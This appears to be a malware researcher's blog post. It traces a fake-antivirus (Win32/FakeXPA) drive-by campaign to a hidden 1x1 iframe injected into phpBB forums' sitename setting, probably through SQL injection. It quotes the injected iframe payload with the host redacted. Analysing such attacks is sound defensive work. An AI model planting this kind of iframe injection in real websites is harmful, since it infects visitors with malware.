Threat Research & Response Blog
(often known as "Antivirus 2009").
One night while browsing, a message box popped up asking me to do a "security scan". As a researcher, I wouldn't let this pass me by. After going through my opened tabs I narrowed down the culprit to a forum I had open at the time.
"View Source" showed a 1x1 pixel IFRAME pointing to hxxp://***.info/users/***/1.php
The position of this IFRAME is a little strange. It appears several times on the page, and each time right after the title of the forum. It appeared to me that this was some kind of variable being replaced with malicious content. It even breaks the HTML when this variable is not used inside a <title> tag:
After a crash course on phpBB, I found out that phpBB stores its entire configuration in the database. In our case, it seems that the following string is concatenated to the content of config_value "sitename":
</title><iframe src=http://***.info/users/***/1.php width=1 height=1></iframe>
I ran some web searches, and found out there are at least about 300 sites containing the same injected IFRAME at the same location.
While I don't have concrete evidence, my bet is that all these sites were attacked by an automated SQL-injection attack.
Now that we found the culprit, I opened up my virtual machine, and dropped the URL in. Sure enough, after several seconds, a dialog popped up and IE process crashed. It was our old friend Win32/FakeXPA.
Digging through the network capture was fun. The attack seemed to be browser specific. (On my initial visit, I only got a message box asking me to manually download "security scan program"). Here's a rough summary of the attack observed in the virtual machine:
So there you have it, this looks like a fairly complex malware distribution operation.
One day later, when I tried the same exploit destination, it had already stopped serving malicious content. When I launched the first stage downloader, the control server stopped giving instructions to download the second stage installer. Strange…--Yuhui Huang